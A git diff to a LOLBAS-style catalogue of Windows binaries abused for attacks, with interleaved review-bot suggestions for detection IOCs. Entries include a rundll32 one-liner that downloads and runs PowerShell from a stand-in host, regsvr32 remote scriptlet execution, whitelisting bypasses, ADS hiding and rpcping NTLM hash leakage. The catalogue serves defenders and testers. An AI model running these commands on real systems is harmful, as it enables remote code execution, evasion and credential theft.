+ Usecase: Copy/Download file from remote server + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\print.exe - - C:\Windows\SysWOW64\print.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\print.exe + - Path: C:\Windows\SysWOW64\print.exe +Code Sample: +- Code: +Detection: + - IOC: Print.exe getting files from internet + - IOC: Print.exe creating executable files on disk Resources: - - https://twitter.com/Oddvarmoe/status/985518877076541440 - - https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://twitter.com/Oddvarmoe/status/985518877076541440 + - Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 90eb292..28e46d0 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml 
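Review bot: Both IOCs describe outcomes (fetching from the Internet, writing executables) rather than the argument pattern that makes these commands recognisable; in all three examples `/D:` is given a file path (`C:\ADS\File.txt:file.exe`, `C:\ADS\CopyOfFile.exe`, `C:\OutFolder\outfile.exe`) rather than what the `Description` implies is normal, a printer. Consider adding `- IOC: print.exe invoked with /D: naming a file path instead of a printer` so the first two commands, which never touch the network, are also covered. The ADS variant is further distinguished by the colon in the `/D:` target.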
@@ -1,18 +1,27 @@ --- -Name: reg.exe -Description: Export Reg, Add ADS, Import Reg -Author: '' +Name: Reg.exe +Description: Used to manipulate the registry +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg - Description: Export the target Registry key and save it to the specified .REG file. + Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. + Usecase: Hide/plant registry information in Alternate data stream for later use + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\reg.exe - - c:\windows\sysWOW64\reg.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\reg.exe + - Path: C:\Windows\SysWOW64\reg.exe +Code Sample: +- Code: +Detection: + - IOC: reg.exe writing to an ADS Resources: - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 04d1966..62d4a91 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml 
@@ -1,25 +1,39 @@ --- Name: Regasm.exe -Description: Execute -Author: '' +Description: Part of .NET +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: regasm.exe /U AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the UnRegisterClass function. - - Command: regasm.exe AllTheThingsx64.dll + - Command: regasm.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. + Usecase: Execute code and bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1121 + MitreLink: https://attack.mitre.org/wiki/Technique/T1121 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regasm.exe AllTheThingsx64.dll + Description: Loads the target .DLL file and executes the RegisterClass function. + Usecase: Execute code and bypass Application whitelisting + Category: Execute + Privileges: User + MitreID: T1121 + MitreLink: https://attack.mitre.org/wiki/Technique/T1121 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe +Code Sample: +- Code: +Detection: + - IOC: regasm.exe executing dll file Resources: - - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs - - 
https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index b88def4..eb3f1d2 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml 
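Review bot: The unregister variant `regasm.exe /U AllTheThingsx64.dll` (UnRegisterClass) that the old file listed first has been dropped, and in its place the second entry repeats `regasm.exe AllTheThingsx64.dll` with only `Category` changed; if the duplication is meant to enumerate categories, the `/U` form is still a distinct command and should come back, e.g. `- Command: regasm.exe /U AllTheThingsx64.dll` / `Description: Loads the target .DLL file and executes the UnRegisterClass function.` with the same `Usecase`/`MitreID` fields. The `/U` path is the one most often cited in the linked AppLocker write-ups, so losing it makes the entry less useful than before. `Code Sample: - Code:` is a null item; an empty list is cleaner.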
@@ -1,20 +1,36 @@ --- -Name: regedit.exe -Description: Write ADS, Read ADS, Import registry -Author: '' +Name: Regedit.exe +Description: Used by Windows to manipulate registry +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey Description: Export the target Registry key to the specified .REG file. + Usecase: Hide registry data in alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: regedit C:\ads\file.txt:regfile.reg" Description: Import the target .REG file into the Registry. + Usecase: Import hidden registry data from alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\regedit.exe - - C:\Windows\SysWOW64\regedit.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\regedit.exe + - Path: C:\Windows\SysWOW64\regedit.exe +Code Sample: +- Code: +Detection: + - IOC: regedit.exe reading and writing to alternate data stream + - IOC: regedit.exe should normally not be executed by end-users Resources: - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index 0db2e3e..5b2b37d 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml 
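Review bot: The second command, kept as context, still carries a stray trailing quote — `regedit C:\ads\file.txt:regfile.reg"` — which is a pre-existing defect but sits in a hunk that rewrites every field around it; drop the quote. The export entry's `Description: Export the target Registry key to the specified .REG file.` was left as-is while the parallel entry in Reg.yml in this same commit was extended to say `within an Alternate data stream`; align it for consistency. The second IOC, `regedit.exe should normally not be executed by end-users`, is a policy statement rather than an indicator — `regedit.exe executed by a non-administrative user` would express the same idea as something a detection can match.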
@@ -1,18 +1,27 @@ --- Name: Register-cimprovider.exe -Description: Execute -Author: '' +Description: Used to register new wmi providers +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Register-cimprovider -path "C:\folder\evil.dll" Description: Load the target .DLL. + Usecase: Execute code within dll file + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\Register-cimprovider.exe - - c:\windows\sysWOW64\Register-cimprovider.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\Register-cimprovider.exe + - Path: C:\Windows\SysWOW64\Register-cimprovider.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/PhilipTsukerman/status/992021361106268161 -Notes: Thanks to PhilipTsukerman - @PhilipTsukerman - + - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 +Acknowledgement: + - Person: Philip Tsukerman + Handle: '@PhilipTsukerman' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 685d988..8a9335b 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml 
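Review bot: `Detection` is a single null `- IOC:`; the command `Register-cimprovider -path "C:\folder\evil.dll"` supports `- IOC: Register-cimprovider.exe loading a DLL from a non-system path via -path`. The entry states `Privileges: User`; registering a provider is the kind of operation that typically needs elevation, so if the technique only relies on the DLL being loaded before registration fails, a one-line `Description` note saying so would stop readers from second-guessing the field — confirm against the linked source. `wmi` in the description should be `WMI`.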
@@ -1,23 +1,37 @@ --- Name: Regsvcs.exe -Description: Execute -Author: '' +Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. + Usecase: Execute dll file and bypass Application whitelisting + Category: Execute + Privileges: User + MitreID: T1121 + MitreLink: https://attack.mitre.org/wiki/Technique/T1121 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regsvcs.exe AllTheThingsx64.dll + Description: Loads the target .DLL file and executes the RegisterClass function. + Usecase: Execute dll file and bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1121 + MitreLink: https://attack.mitre.org/wiki/Technique/T1121 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\regsvcs.exe + - Path: C:\Windows\SysWOW64\regsvcs.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ + - Link: 
https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 1347c93..e750927 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml 
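Review bot: `Full Path` was changed to `C:\Windows\System32\regsvcs.exe` and `C:\Windows\SysWOW64\regsvcs.exe`, replacing the four `C:\Windows\Microsoft.NET\Framework[64]\v2.0.50727|v4.0.30319\regsvcs.exe` paths the old file listed; regsvcs ships with the .NET Framework, and the sibling Regasm.yml hunk in this same commit keeps the Framework paths, so these look like a copy-paste from a System32 binary. Anyone building an AppLocker/WDAC deny rule or a path-based detection from this field would miss the real binary. Restore the .NET directories (the Regasm entry is the model), and consider replacing the null `- IOC:` with `- IOC: regsvcs.exe loading a DLL from a non-GAC, user-writable path`.

```yaml
Full Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
# … unchanged: Code Sample, Detection, Resources, Acknowledgement …
```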
@@ -1,22 +1,54 @@ --- Name: Regsvr32.exe -Description: Execute -Author: '' +Description: Used by Windows to register dlls +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. - - Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll + Usecase: Execute code from remote scriptlet, bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1117 + MitreLink: https://attack.mitre.org/wiki/Technique/T1117 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. + Usecase: Execute code from scriptlet, bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1117 + MitreLink: https://attack.mitre.org/wiki/Technique/T1117 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll + Description: Execute the specified remote .SCT script with scrobj.dll. + Usecase: Execute code from remote scriptlet, bypass Application whitelisting + Category: Execute + Privileges: User + MitreID: T1117 + MitreLink: https://attack.mitre.org/wiki/Technique/T1117 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll + Description: Execute the specified local .SCT script with scrobj.dll. 
+ Usecase: Execute code from scriptlet, bypass Application whitelisting + Category: Execute + Privileges: User + MitreID: T1117 + MitreLink: https://attack.mitre.org/wiki/Technique/T1117 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\regsvr32.exe - - C:\Windows\SysWOW64\regsvr32.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\regsvr32.exe + - Path: C:\Windows\SysWOW64\regsvr32.exe +Code Sample: +- Code: +Detection: + - IOC: regsvr32.exe getting files from Internet + - IOC: regsvr32.exe executing scriptlet files Resources: - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index dd00da6..6294b2d 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml 
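Review bot: Both IOCs describe the effect (fetching from the Internet, executing scriptlets) but not the command-line shape that every one of the four entries shares: `/i:` followed by a `.sct` path or URL, and `scrobj.dll` as the DLL argument. Add `- IOC: regsvr32.exe invoked with scrobj.dll and an /i: argument that is a URL or .sct file` so the local variant (`/i:file.sct`), which never touches the network, is also covered. The fix of `- Commands:` to `- Command:` on the second entry is correct and was previously a silent schema break.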
@@ -1,21 +1,36 @@ --- Name: Replace.exe -Description: Copy, Download -Author: '' +Description: Used to replace file with another file +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: replace.exe C:\Source\File.cab C:\Destination /A - Description: Copy the specified file to the destination folder. + Description: Copy file.cab to destination + Usecase: Copy files + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A - Description: Copy the specified file to the destination folder. + Description: Download/Copy bar.exe to outdir + Usecase: Download file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\replace.exe - - C:\Windows\SysWOW64\replace.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\replace.exe + - Path: C:\Windows\SysWOW64\replace.exe +Code Sample: +- Code: +Detection: + - IOC: Replace.exe getting files from remote server Resources: - - https://twitter.com/elceef/status/986334113941655553 - - https://twitter.com/elceef/status/986842299861782529 -Notes: Thanks to elceef - @elceef - + - Link: https://twitter.com/elceef/status/986334113941655553 + - Link: https://twitter.com/elceef/status/986842299861782529 +Acknowledgement: + - Person: elceef + Handle: '@elceef' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index 8ac1eab..f5871a3 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml 
@@ -1,25 +1,31 @@ --- Name: Rpcping.exe -Description: Credentials -Author: '' +Description: Used to verify rpc connection +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: rpcping -s 127.0.0.1 -t ncacn_np - Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. - - Command: rpcping -s 192.168.1.10 -ncacn_np - Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. + Usecase: Capture credentials on a non-standard port + Category: Credentials + Privileges: User + MitreID: T1003 + MitreLink: https://attack.mitre.org/wiki/Technique/T1003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\rpcping.exe - - C:\Windows\SysWOW64\rpcping.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\rpcping.exe + - Path: C:\Windows\SysWOW64\rpcping.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/subtee/status/872797890539913216 - - https://github.com/vysec/RedTips - - https://twitter.com/vysecurity/status/974806438316072960 - - https://twitter.com/vysecurity/status/873181705024266241 -Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity - + - Link: https://github.com/vysec/RedTips + - Link: https://twitter.com/vysecurity/status/974806438316072960 + - Link: https://twitter.com/vysecurity/status/873181705024266241 +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' + - Person: Vincent Yiu + Handle: '@vysecurity' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 494b4bb..46f3b6f 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml 
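Review bot: `Detection:` ends with a bare `- IOC:` so the new Rpcping entry ships a null indicator instead of a value; Rundll32.yml and Xwizard.yml in this commit carry the same empty `- IOC:`. The one command kept here is documented as forcing the NTLM hash to be sent to the target, so a value such as `- IOC: Rpcping.exe authenticating to an unexpected host or non-standard port` would give defenders something to key on and match the populated IOCs in the other files. Wording: `Description: Used to verify rpc connection` reads better as `Used to verify an RPC connection`.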
@@ -1,32 +1,70 @@ --- Name: Rundll32.exe -Description: Execute, Read ADS -Author: '' +Description: Used by Windows to execute dll files +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: rundll32.exe AllTheThingsx64,EntryPoint - Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. + Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. + Usecase: Execute dll file + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. + Usecase: Execute code from Internet + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. 
+ Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. + Usecase: Execute code from Internet + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). 
+ Usecase: Execute code from alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\rundll32.exe - - C:\Windows\SysWOW64\rundll32.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\rundll32.exe + - Path: C:\Windows\SysWOW64\rundll32.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ - - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ + - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index 9d32bb5..30c39ec 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml 
@@ -1,20 +1,28 @@ --- Name: Runonce.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Runonce.exe /AlternateShellStartup - Description: Executes a Run Once Task that has been configured in the registry. + Description: Executes a Run Once Task that has been configured in the registry + Usecase: Persistence, bypassing defensive counter measures + Category: Execute + Privileges: Administrator + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\runonce.exe - - c:\windows\sysWOW64\runonce.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\runonce.exe + - Path: C:\Windows\SysWOW64\runonce.exe +Code Sample: +- Code: +Detection: + - IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY Resources: - - https://twitter.com/pabraeken/status/990717080805789697 - - https://cmatskas.com/configure-a-runonce-task-on-windows/ -Notes: | - Thanks to Pierre-Alexandre Braeken - @pabraeken - Requires Administrative access. + - Link: https://twitter.com/pabraeken/status/990717080805789697 + - Link: https://cmatskas.com/configure-a-runonce-task-on-windows/ +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 5c25cc7..8d7f4dd 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml 
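Review bot: `Description:` is left empty in the new Runonce entry, so the field parses to null where the template expects a sentence; Runscripthelper.yml, Scriptrunner.yml and Xwizard.yml in this commit have the same blank field. The removed `Description: Execute` was a category rather than a description, so a one-line purpose statement in the style of the other files (Sc.yml's `Used by Windows to manage services`, for instance) is what the field now calls for. `Privileges: Administrator` correctly carries over the old note's "Requires Administrative access".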
@@ -1,17 +1,28 @@ --- Name: Runscripthelper.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test - Description: Execute the PowerShell script named test.txt. + Description: Execute the PowerShell script named test.txt + Usecase: Bypass constrained language mode and execute Powershell script + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe ' - - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe + - Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe +Code Sample: +- Code: +Detection: + - IOC: Event 4014 - Powershell logging + - IOC: Event 400 Resources: - - https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc -Notes: Thanks to Matt Graeber - @mattifestation + - Link: https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index d2277f3..3778572 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml 
